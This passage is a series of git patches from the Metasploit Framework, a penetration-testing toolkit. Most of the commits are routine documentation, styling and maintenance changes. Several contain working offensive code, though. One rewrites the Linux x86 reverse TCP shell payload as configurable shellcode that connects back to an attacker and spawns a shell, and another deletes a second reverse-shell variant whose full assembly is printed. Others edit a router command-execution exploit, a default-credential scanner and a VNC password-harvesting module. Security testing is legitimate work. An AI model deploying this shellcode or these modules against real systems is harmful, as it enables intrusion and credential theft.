r.render(kb) %> -<% end %> </div> +<% end %> </body> </html> \ No newline at end of file From 7444a0ff042dd6a3e41f3fb9984b2f3cc5e14315 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 17:59:45 -0600 Subject: [PATCH 364/686] Make it more obvious which tab the user is viewing --- data/markdown_doc/html_template.erb | 14 +++++++++++++- data/markdown_doc/markdown.css | 11 ++++++++++- 2 files changed, 23 insertions(+), 2 deletions(-) diff --git a/data/markdown_doc/html_template.erb b/data/markdown_doc/html_template.erb index e115d419f4..7914b4e6b6 100644 --- a/data/markdown_doc/html_template.erb +++ b/data/markdown_doc/html_template.erb @@ -3,11 +3,23 @@ <% unless kb.empty? %> <script> function showBasic() { + var basic_info_button = document.getElementById('basic_info_button'); + basic_info_button.style.borderColor = "#ccc"; + basic_info_button.style.color = "#333"; + var knowledge_base_button = document.getElementById('knowledge_base_button'); + knowledge_base_button.style.borderColor = "#EEEEEE"; + knowledge_base_button.style.color = "#C4C4C4"; document.getElementById('knowledge_base').style.display = "none"; document.getElementById('basic_info').style.display = "inline"; } function showKnowledge() { + var basic_info_button = document.getElementById('basic_info_button'); + basic_info_button.style.borderColor = "#EEEEEE"; + basic_info_button.style.color = "#C4C4C4"; + var knowledge_base_button = document.getElementById('knowledge_base_button'); + knowledge_base_button.style.borderColor = "#ccc"; + knowledge_base_button.style.color = "#333"; document.getElementById('basic_info').style.display = "none"; document.getElementById('knowledge_base').style.display = "inline"; } @@ -25,7 +37,7 @@ <div id="basic_info_button" onClick="showBasic()">Basic Information</a> </th> <th> -<div id="Knowledge_base_button" onClick="showKnowledge()">Knowledge Base</a> +<div id="knowledge_base_button" onClick="showKnowledge()">Knowledge Base</a> </th> </tr></table> <p></p> diff --git a/data/markdown_doc/markdown.css b/data/markdown_doc/markdown.css index bd4406fc63..eb87b1588a 100644 --- a/data/markdown_doc/markdown.css +++ b/data/markdown_doc/markdown.css @@ -116,7 +116,7 @@ pre code { margin:10px auto; } } -#basic_info_button, #knowledge_base_button { +#basic_info_button { font-family:Arial, sans-serif; font-size:12px; padding:10px 5px; @@ -125,6 +125,15 @@ pre code { border-color:#ccc; color:#333; } +#knowledge_base_button { + font-family:Arial, sans-serif; + font-size:12px; + padding:10px 5px; + border-style:solid; + border-width:1px; + border-color:#EEEEEE; + color:#C4C4C4; +} #basic_info_button:hover, #knowledge_base_button:hover { cursor: pointer; } From b409b2237d8e5a53e728169fe999c211379056db Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Thu, 18 Feb 2016 18:17:56 -0600 Subject: [PATCH 365/686] update to use the common bind_addresses method --- lib/msf/core/handler/reverse_http.rb | 58 +++++++++++++--------------- 1 file changed, 27 insertions(+), 31 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index cfc80b4fac..e4fe6a4c6e 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -63,28 +63,11 @@ module ReverseHttp ], Msf::Handler::ReverseHttp) end - # Determine where to bind the server - # - # @return [String] - def listener_address - if datastore['ReverseListenerBindAddress'] - bindaddr = datastore['ReverseListenerBindAddress'] - else - begin - bindaddr = Rex::Socket.getaddress(datastore['LHOST']) - rescue SocketError - bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0' - end - end - - bindaddr - end - # Return a URI suitable for placing in a payload # # @return [String] A URI of the form +scheme://host:port/+ - def listener_uri - uri_host = Rex::Socket.is_ipv6?(listener_address) ? "[#{listener_address}]" : listener_address + def listener_uri(addr) + uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr "#{scheme}://#{uri_host}:#{bind_port}/" end @@ -133,20 +116,33 @@ module ReverseHttp # def setup_handler + local_addr = nil local_port = bind_port + ex = false # Start the HTTPS server service on this host/port - self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, - local_port, - listener_address, - ssl?, - { - 'Msf' => framework, - 'MsfExploit' => self, - }, - nil, - (ssl?) ? datastore['HandlerSSLCert'] : nil - ) + bind_addresses.each do |ip| + begin + self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, + local_port, ip, ssl?, + { + 'Msf' => framework, + 'MsfExploit' => self, + }, + nil, + (ssl?) ? datastore['HandlerSSLCert'] : nil + ) + local_addr = ip + rescue + ex = $! + print_error("Handler failed to bind to #{ip}:#{local_port}") + else + ex = false + break + end + end + + raise ex if (ex) self.service.server_name = datastore['MeterpreterServerName'] @@ -160,7 +156,7 @@ module ReverseHttp }, 'VirtualDirectory' => true) - print_status("Started #{scheme.upcase} reverse handler on #{listener_uri}") + print_status("Started #{scheme.upcase} reverse handler on #{listener_uri(local_addr)}") lookup_proxy_settings if datastore['IgnoreUnknownPayloads'] From 3b9502cb1d6817992666f025b8ca4cd68c33ffb7 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 18 Feb 2016 18:45:04 -0600 Subject: [PATCH 366/686] Don't require username in wrt110 module. --- modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index c8d41f7060..07ef38cb19 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options([ - OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), + OptString.new('USERNAME', [ false, 'Valid router administrator username', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) From b58166a9a84f1bbb045c2dccd43472ab57722012 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Thu, 18 Feb 2016 20:13:39 -0600 Subject: [PATCH 367/686] add android platform to the hash --- modules/post/multi/manage/play_youtube.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 3d44dba25c..b4b18d615c 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], - 'Platform' => [ 'win', 'osx', 'linux' ], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) From e67e47736203284acc81c0cbb020ac2daba200fa Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 18 Feb 2016 20:24:30 -0600 Subject: [PATCH 368/686] Make x86/shell_reverse_tcp's shell path configurable. Also removes shell_reverse_tcp2 shell. --- .../singles/linux/x86/shell_reverse_tcp.rb | 102 +++++++++--------- .../singles/linux/x86/shell_reverse_tcp2.rb | 98 ----------------- 2 files changed, 54 insertions(+), 146 deletions(-) delete mode 100644 modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 3b1310ffe6..86553025cd 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -10,8 +10,6 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 - CachedSize = 68 - include Msf::Payload::Single include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions @@ -20,56 +18,64 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => 'Ramon de C Valle', + 'Author' => ['Ramon de C Valle', 'joev'], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::CommandShellUnix, - 'Payload' => - { - 'Offsets' => - { - 'LHOST' => [ 25, 'ADDR' ], - 'LPORT' => [ 32, 'n' ], - }, - 'Payload' => - "\x31\xdb" +# xor ebx,ebx - "\xf7\xe3" +# mul ebx - "\x53" +# push ebx - "\x43" +# inc ebx - "\x53" +# push ebx - "\x6a\x02" +# push byte +0x2 - "\x89\xe1" +# mov ecx,esp - "\xb0\x66" +# mov al,0x66 - "\xcd\x80" +# int 0x80 - "\x93" +# xchg eax,ebx - "\x59" +# pop ecx - "\xb0\x3f" +# mov al,0x3f - "\xcd\x80" +# int 0x80 - "\x49" +# dec ecx - "\x79\xf9" +# jns 0x11 - "\x68\x7f\x00\x00\x01" +# push dword 0x100007f - "\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002 - "\x89\xe1" +# mov ecx,esp - "\xb0\x66" +# mov al,0x66 - "\x50" +# push eax - "\x51" +# push ecx - "\x53" +# push ebx - "\xb3\x03" +# mov bl,0x3 - "\x89\xe1" +# mov ecx,esp - "\xcd\x80" +# int 0x80 - "\x52" +# push edx - "\x68\x2f\x2f\x73\x68" +# push dword 0x68732f2f - "\x68\x2f\x62\x69\x6e" +# push dword 0x6e69622f - "\x89\xe3" +# mov ebx,esp - "\x52" +# push edx - "\x53" +# push ebx - "\x89\xe1" +# mov ecx,esp - "\xb0\x0b" +# mov al,0xb - "\xcd\x80" # int 0x80 - } - )) + 'Session' => Msf::Sessions::CommandShellUnix + )) + + register_options([ + OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]) + ]) + end + + def generate + # pad the shell path to a multiple of 4 with slashes + shell = datastore['CMD'] + remainder = shell.bytes.length % 4 + shell_padded = ("/" * (4-remainder)) + shell + + "\x31\xdb" +# xor ebx,ebx + "\xf7\xe3" +# mul ebx + "\x53" +# push ebx + "\x43" +# inc ebx + "\x53" +# push ebx + "\x6a\x02" +# push byte +0x2 + "\x89\xe1" +# mov ecx,esp + "\xb0\x66" +# mov al,0x66 (sys_socketcall) + "\xcd\x80" +# int 0x80 + "\x93" +# xchg eax,ebx + "\x59" +# pop ecx + "\xb0\x3f" +# mov al,0x3f (sys_dup2) + "\xcd\x80" +# int 0x80 + "\x49" +# dec ecx + "\x79\xf9" +# jns 0x11 + "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push dword 0x100007f + "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push dword 0xbfbf0002 + "\x89\xe1" +# mov ecx,esp + "\xb0\x66" +# mov al,0x66 (sys_socketcall) + "\x50" +# push eax + "\x51" +# push ecx + "\x53" +# push ebx + "\xb3\x03" +# mov bl,0x3 + "\x89\xe1" +# mov ecx,esp + "\xcd\x80" +# int 0x80 + "\x52" +# push edx + + # Split shellname into 4-byte words and push them one-by-one + # on to the stack + shell_padded.bytes.reverse.each_slice(4).map do |word| + "\x68" + word.reverse.pack('C*') + end.join + + + "\x89\xe3" +# mov ebx,esp + "\x52" +# push edx + "\x53" +# push ebx + "\x89\xe1" +# mov ecx,esp + "\xb0\x0b" +# mov al,0xb (execve) + "\xcd\x80" # int 0x80 end end diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb deleted file mode 100644 index d31c4ccc7c..0000000000 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ /dev/null @@ -1,98 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'metasm' -require 'msf/core' -require 'msf/core/handler/reverse_tcp' -require 'msf/base/sessions/command_shell' -require 'msf/base/sessions/command_shell_options' - -module Metasploit3 - - CachedSize = 70 - - include Msf::Payload::Single - include Msf::Payload::Linux - include Msf::Sessions::CommandShellOptions - - def initialize(info = {}) - -# Remark: this function seems to be called a LOT, even before the shellcode is used. -# We would better implement some caching. - -# We decoded skape's shellcode by using irb -r metasm-shell -# and: puts shellcode.decode - super(merge_info(info, - 'Name' => 'Linux Command Shell, Reverse TCP Inline - Metasm Demo', - 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => ['skape', 'Yoann Guillot', 'Julien Tinnes <julien[at]cr0.org>'], - 'License' => MSF_LICENSE, - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::CommandShellUnix, - 'Payload' => - { - 'Offsets' => - { - 'LHOST' => [ 0, 'ADDR' ], - 'LPORT' => [ 0, 'n' ], - }, - 'Assembly' => <<EOS - xor ebx, ebx ; @00000000 31db - push ebx ; @00000002 53 - inc ebx ; @00000003 43 - push ebx ; @00000004 53 - push 2 ; @00000005 6a02 - push 66h ; @00000007 6a66 - pop eax ; @00000009 58 - mov ecx, esp ; @0000000a 89e1 - int 80h ; @0000000c cd80 - xchg ebx, eax ; @0000000e 93 - pop ecx ; @0000000f 59 - - ; Xrefs: 0000000f, 00000015 -xref_00000010_uuidfdbd8: - mov al, 3fh ; @00000010 b03f - int 80h ; @00000012 cd80 - dec ecx ; @00000014 49 - jns xref_00000010_uuidfdbd8 ; @00000015 79f9 -- to 10h - - ; Xrefs: 00000015 - pop ebx ; @00000017 5b - pop edx ; @00000018 5a - push LHOST ; @00000019 687f000001 - push.i16 LPORT ; @0000001e 6668bfbf - inc ebx ; @00000022 43 - push bx ; @00000023 6653 - mov ecx, esp ; @00000025 89e1 - mov al, 66h ; @00000027 b066 - push eax ; @00000029 50 - push ecx ; @0000002a 51 - push ebx ; @0000002b 53 - mov ecx, esp ; @0000002c 89e1 - inc ebx ; @0000002e 43 - int 80h ; @0000002f cd80 - push edx ; @00000031 52 - push 68732f2fh ; @00000032 682f2f7368 - push 6e69622fh ; @00000037 682f62696e - mov ebx, esp ; @0000003c 89e3 - push edx ; @0000003e 52 - push ebx ; @0000003f 53 - mov ecx, esp ; @00000040 89e1 - mov al, 0bh ; @00000042 b00b - int 80h ; @00000044 cd80 -EOS - } - )) - end - - - # hardcode the size of the encoded payload, otherwise the shellcode is assembled during msf initialization - def size - #puts "size of #{name}: #{super()}" - 103 - end -end From 2b784a48b92af814228791c3a50de3ac9392dcb2 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 18 Feb 2016 20:29:42 -0600 Subject: [PATCH 369/686] Include cached size. --- modules/payloads/singles/linux/x86/shell_reverse_tcp.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 86553025cd..45291827a0 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 + CachedSize = 68 + include Msf::Payload::Single include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions From b3e8cd4f51dfe0971021838f41f9fc7620eafdd5 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 18 Feb 2016 20:36:52 -0600 Subject: [PATCH 370/686] Save some bytes on the padded string. --- modules/payloads/singles/linux/x86/shell_reverse_tcp.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 45291827a0..40c81ad830 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -37,6 +37,7 @@ module Metasploit3 # pad the shell path to a multiple of 4 with slashes shell = datastore['CMD'] remainder = shell.bytes.length % 4 + if remainder == 0 then remainder = 4 end shell_padded = ("/" * (4-remainder)) + shell "\x31\xdb" +# xor ebx,ebx From 39f1113bca647da7836ef5d01560bc4cce587b8d Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 18 Feb 2016 22:20:13 -0600 Subject: [PATCH 371/686] Remove unused spec. --- spec/modules/payloads_spec.rb | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 0bbe2cf9d3..528b41f0da 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -1637,16 +1637,6 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/x86/shell_reverse_tcp' end - context 'linux/x86/shell_reverse_tcp2' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/x86/shell_reverse_tcp2' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/shell_reverse_tcp2' - end - context 'mainframe/shell_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 34d10d78297161805d51d3fb2912c9bbef091e0c Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 19 Feb 2016 00:13:55 -0600 Subject: [PATCH 372/686] Should be fullname --- data/markdown_doc/payload_demo_template.erb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/data/markdown_doc/payload_demo_template.erb b/data/markdown_doc/payload_demo_template.erb index 5b2d392cc9..ff6620a3aa 100644 --- a/data/markdown_doc/payload_demo_template.erb +++ b/data/markdown_doc/payload_demo_template.erb @@ -5,4 +5,4 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options msf <%= mod.type %>(<%= mod.shortname %>) > generate ``` -To learn how to generate <%= mod.shortname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom). \ No newline at end of file +To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom). \ No newline at end of file From 33aaeb4ac9ee4faf4d0eb715f5aef42875af70a8 Mon Sep 17 00:00:00 2001 From: dmohanty-r7 <Dev_Mohanty@rapid7.com> Date: Fri, 19 Feb 2016 11:53:17 -0600 Subject: [PATCH 373/686] Update authors --- modules/auxiliary/scanner/karaf/login.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/karaf/login.rb b/modules/auxiliary/scanner/karaf/login.rb index 8eee64e9e0..acb382cbbd 100644 --- a/modules/auxiliary/scanner/karaf/login.rb +++ b/modules/auxiliary/scanner/karaf/login.rb @@ -21,11 +21,13 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ TODO }, - 'Author' => ['TODO'], - # 'References' => - # [ - # [ 'CVE', '1999-0502'] # Weak password - # ], + 'Author' => [ + 'Samuel Huckins', + 'Brent Cook', + 'Peer Aagaard', + 'Greg Mikeska', + 'Dev Mohanty' + ], 'License' => MSF_LICENSE ) From c0180b23fa50486662fdacf0aeafa6c62c315e25 Mon Sep 17 00:00:00 2001 From: dmohanty-r7 <Dev_Mohanty@rapid7.com> Date: Fri, 19 Feb 2016 13:39:13 -0600 Subject: [PATCH 374/686] Update description --- modules/auxiliary/scanner/karaf/login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/karaf/login.rb b/modules/auxiliary/scanner/karaf/login.rb index acb382cbbd..1749d4379f 100644 --- a/modules/auxiliary/scanner/karaf/login.rb +++ b/modules/auxiliary/scanner/karaf/login.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'Karaf Default Credential Scanner', 'Description' => %q{ - TODO + This module uses default Karaf credentials to login to the console via ssh. }, 'Author' => [ 'Samuel Huckins', From bfd204ac502015450583cdb749b64b0d4b6ffd59 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Fri, 19 Feb 2016 15:00:56 -0600 Subject: [PATCH 375/686] Fix some cosmetic issues --- modules/post/windows/gather/credentials/vnc.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 040a6a436c..0442f20835 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Post #check uninstall key begin root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1") - open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) + open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) vnclocation = open_key.query_value("InstallLocation").data locations << {:name => 'UltraVNC', - :check_file => vnclocation + "\\ultravnc.ini", - :pass_variable => 'passwd=', - :viewonly_variable => 'passwd2=', - :port_variable => 'PortNumber='} + :check_file => vnclocation + "\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} rescue Rex::Post::Meterpreter::RequestError => e vprint_error(e.message) end From 72a69fcd161d5effa9e04ed50f98c97b4ae31043 Mon Sep 17 00:00:00 2001 From: RubenRocha <eb23aradasrrocha@gmail.com> Date: Fri, 19 Feb 2016 21:12:01 +0000 Subject: [PATCH 376/686] Fixed timeout warning --- lib/net/ssh/transport/session.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/net/ssh/transport/session.rb b/lib/net/ssh/transport/session.rb index 3bd4e33f66..515c681901 100644 --- a/lib/net/ssh/transport/session.rb +++ b/lib/net/ssh/transport/session.rb @@ -65,9 +65,10 @@ module Net; module SSH; module Transport factory = options[:proxy] if (factory) - @socket = timeout(options[:timeout] || 0) { factory.open(@host, @port) } + @socket = ::Timeout.timeout(options[:timeout] || 0) { factory.open(@host, +@port) } else - @socket = timeout(options[:timeout] || 0) { + @socket = ::Timeout.timeout(options[:timeout] || 0) { Rex::Socket::Tcp.create( 'PeerHost' => @host, 'PeerPort' => @port, From c8b28d90d1d200232cd3c9a771fa99b1ebb02142 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 19 Feb 2016 19:08:38 -0600 Subject: [PATCH 377/686] Fix old comment. --- modules/payloads/singles/linux/x86/shell_reverse_tcp.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 40c81ad830..f472235c1f 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -55,8 +55,8 @@ module Metasploit3 "\xcd\x80" +# int 0x80 "\x49" +# dec ecx "\x79\xf9" +# jns 0x11 - "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push dword 0x100007f - "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push dword 0xbfbf0002 + "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push ip addr + "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push port "\x89\xe1" +# mov ecx,esp "\xb0\x66" +# mov al,0x66 (sys_socketcall) "\x50" +# push eax From 24530e27345cef8e0711db6b5cd208a729f50835 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 19 Feb 2016 20:46:39 -0600 Subject: [PATCH 378/686] Scrollable list, tab name change, print_status --- data/markdown_doc/default_template.erb | 1 + data/markdown_doc/html_template.erb | 22 +++++++++---------- data/markdown_doc/markdown.css | 12 ++++++++-- lib/msf/ui/console/command_dispatcher/core.rb | 2 ++ lib/msf/util/document_generator/normalizer.rb | 17 ++++++++++++++ .../document_generator/pull_request_finder.rb | 1 + 6 files changed, 42 insertions(+), 13 deletions(-) diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb index 0d336b78af..e1f3e38e50 100644 --- a/data/markdown_doc/default_template.erb +++ b/data/markdown_doc/default_template.erb @@ -24,6 +24,7 @@ ## Available Targets <%= normalize_targets(items[:mod_targets]) %> + <% end %> <% unless items[:mod_platforms].empty? %> diff --git a/data/markdown_doc/html_template.erb b/data/markdown_doc/html_template.erb index 7914b4e6b6..ff5dbdcb08 100644 --- a/data/markdown_doc/html_template.erb +++ b/data/markdown_doc/html_template.erb @@ -2,25 +2,25 @@ <head> <% unless kb.empty? %> <script> - function showBasic() { - var basic_info_button = document.getElementById('basic_info_button'); - basic_info_button.style.borderColor = "#ccc"; - basic_info_button.style.color = "#333"; + function showOverview() { + var overview_info_button = document.getElementById('overview_info_button'); + overview_info_button.style.borderColor = "#ccc"; + overview_info_button.style.color = "#333"; var knowledge_base_button = document.getElementById('knowledge_base_button'); knowledge_base_button.style.borderColor = "#EEEEEE"; knowledge_base_button.style.color = "#C4C4C4"; document.getElementById('knowledge_base').style.display = "none"; - document.getElementById('basic_info').style.display = "inline"; + document.getElementById('overview_info').style.display = "inline"; } function showKnowledge() { - var basic_info_button = document.getElementById('basic_info_button'); - basic_info_button.style.borderColor = "#EEEEEE"; - basic_info_button.style.color = "#C4C4C4"; + var overview_info_button = document.getElementById('overview_info_button'); + overview_info_button.style.borderColor = "#EEEEEE"; + overview_info_button.style.color = "#C4C4C4"; var knowledge_base_button = document.getElementById('knowledge_base_button'); knowledge_base_button.style.borderColor = "#ccc"; knowledge_base_button.style.color = "#333"; - document.getElementById('basic_info').style.display = "none"; + document.getElementById('overview_info').style.display = "none"; document.getElementById('knowledge_base').style.display = "inline"; } </script> @@ -34,7 +34,7 @@ <table border="0"> <tr> <th> -<div id="basic_info_button" onClick="showBasic()">Basic Information</a> +<div id="overview_info_button" onClick="showOverview()">Overview</a> </th> <th> <div id="knowledge_base_button" onClick="showKnowledge()">Knowledge Base</a> @@ -42,7 +42,7 @@ </tr></table> <p></p> <% end %> -<div id="basic_info"> +<div id="overview_info"> <%= r.render(md) %> </div> <% unless kb.empty? %> diff --git a/data/markdown_doc/markdown.css b/data/markdown_doc/markdown.css index eb87b1588a..d5323c73bb 100644 --- a/data/markdown_doc/markdown.css +++ b/data/markdown_doc/markdown.css @@ -116,7 +116,7 @@ pre code { margin:10px auto; } } -#basic_info_button { +#overview_info_button { font-family:Arial, sans-serif; font-size:12px; padding:10px 5px; @@ -134,12 +134,20 @@ pre code { border-color:#EEEEEE; color:#C4C4C4; } -#basic_info_button:hover, #knowledge_base_button:hover { +#overview_info_button:hover, #knowledge_base_button:hover { cursor: pointer; } #knowledge_base { display: none; } +#long_list { + height:280px; + overflow:auto; + border-style: solid; + border-width: 1px; + border-color: #ccc; + padding: 5px; +} /* diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 64c81f1f19..01a12813b7 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -774,6 +774,7 @@ class Core if dump_json print(Serializer::Json.dump_module(active_module) + "\n") elsif show_doc + print_status("Please wait, generating documentation for #{active_module.shortname}") Msf::Util::DocumentGenerator.spawn_module_document(active_module) else print(Serializer::ReadableText.dump_module(active_module)) @@ -796,6 +797,7 @@ class Core elsif dump_json print(Serializer::Json.dump_module(mod) + "\n") elsif show_doc + print_status("Please wait, generating documentation for #{mod.shortname}") Msf::Util::DocumentGenerator.get_module_document(mod) else print(Serializer::ReadableText.dump_module(mod)) diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 9bc7c8d006..fffea0ed53 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -4,11 +4,22 @@ require 'erb' module Redcarpet module Render class MsfMdHTML < Redcarpet::Render::HTML + def block_code(code, language) "<pre>" \ "<code>#{code}</code>" \ "</pre>" end + + + def list(content, list_type) + if list_type == :unordered && content.scan(/<li>/).flatten.length > 15 + %Q|<p><div id=\"long_list\"><ul>#{content}<ul></div></p>| + else + %Q|<ul>#{content}</ul>| + end + end + end end end @@ -82,6 +93,12 @@ module Msf def normalize_pull_requests(pull_requests) if pull_requests.kind_of?(PullRequestFinder::Exception) error = pull_requests.message + case error + when /GITHUB_OAUTH_TOKEN/i + error << " [See how](" + error << "https://help.github.com/articles/creating-an-access-token-for-command-line-use/" + error << ")" + end return error end diff --git a/lib/msf/util/document_generator/pull_request_finder.rb b/lib/msf/util/document_generator/pull_request_finder.rb index ea2ca57367..484ddf7c18 100644 --- a/lib/msf/util/document_generator/pull_request_finder.rb +++ b/lib/msf/util/document_generator/pull_request_finder.rb @@ -34,6 +34,7 @@ module Msf # @return [void] def initialize unless ENV.has_key?('GITHUB_OAUTH_TOKEN') + msg = '' raise PullRequestFinder::Exception, 'GITHUB_OAUTH_TOKEN environment variable not set.' end From b868f7cc89bee907e3c3e007947b65aadde105a0 Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Fri, 19 Feb 2016 20:19:43 -0800 Subject: [PATCH 379/686] Bump version of framework to 4.11.12 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 4cf7c7588b..c0937476b4 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - 